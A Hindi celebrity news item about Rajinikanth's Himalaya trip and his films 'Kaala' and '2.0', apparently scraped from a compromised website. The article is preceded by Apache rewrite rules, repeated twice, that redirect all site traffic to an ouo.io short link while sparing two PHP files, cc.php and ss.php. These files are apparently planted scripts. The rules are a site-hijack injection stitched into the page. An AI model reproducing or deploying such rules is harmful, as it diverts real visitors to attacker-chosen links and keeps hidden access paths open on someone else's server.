
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 334
Previous Nextमुंबई। इन दिनों हिमालय की यात्रा पर निकले रजनीकांत की कुछ तस्वीरें सोशल मीडिया पर शेयर की जा रही हैं। इनमें से एक तस्वीर में वह घोड़े की सवारी करते नजर आए। इस यात्रा पर निकलने से पहले रजनीकांत ने मीडिया को जानकारी दी थी कि उनकी ये यात्रा करीब 15 दिन की होगी। इस यात्रा में उन्होंने आध्यात्मिक गुरु से भी मुलाकात की। तस्वीरों में आप देखेंगे कि इस यात्रा पर रजनीकांत सफेद कपड़ों में नजर आ रहे हैं। बता दें कि रजनीकांत अक्सर कुछ दिनों के लिए सार्वजनिक जीवन से संन्यास लेकर हिमालय जाते हैं। यहां कुछ समय वह सुकून से गुजारते हैं। सुपरस्टार के इस यात्रा पर निकलने से पहले उनके पब्लिसिस्ट रियाज के.अहमद ने ये जानकारी सोशल मीडिया पर भी शेयर की थी। रियाज ने ट्वीट किया, 'थलैवा' हिमालय की ओर निकलने वाले हैं"। मीडिया रिपोर्ट्स के मुताबिक रजनीकांत ने हिमालय पर अपने दोस्तों के साथ मिलकर एक मेडिटेशन सेंटर बनाया है। ऐसा कहा जाता है कि वह वहीं कुछ समय के लिए वहीं जाते हैं। रजनीकांत के फिल्मी प्रोजेक्ट्स की बात करें तो ‘काला’ 27 अप्रैल को रिलीज हो रही है। फिल्म का टीजर पहले ही रिलीज हो चुका है और रजनीकांत के फैन्स के बीच उनका क्रेज एक बार फिर सिर चढ़कर बोलने लगा है। इसके अलावा उनकी फिल्म 2.0 भी सुर्खियों में है। इस फिल्म में उनके साथ अक्षय कुमार, ऐमी जैक्सन लीड रोल में हैं। 2.0 से अक्षय पहली बार साउथ इंडस्ट्री में कदम रखने जा रहे हैं।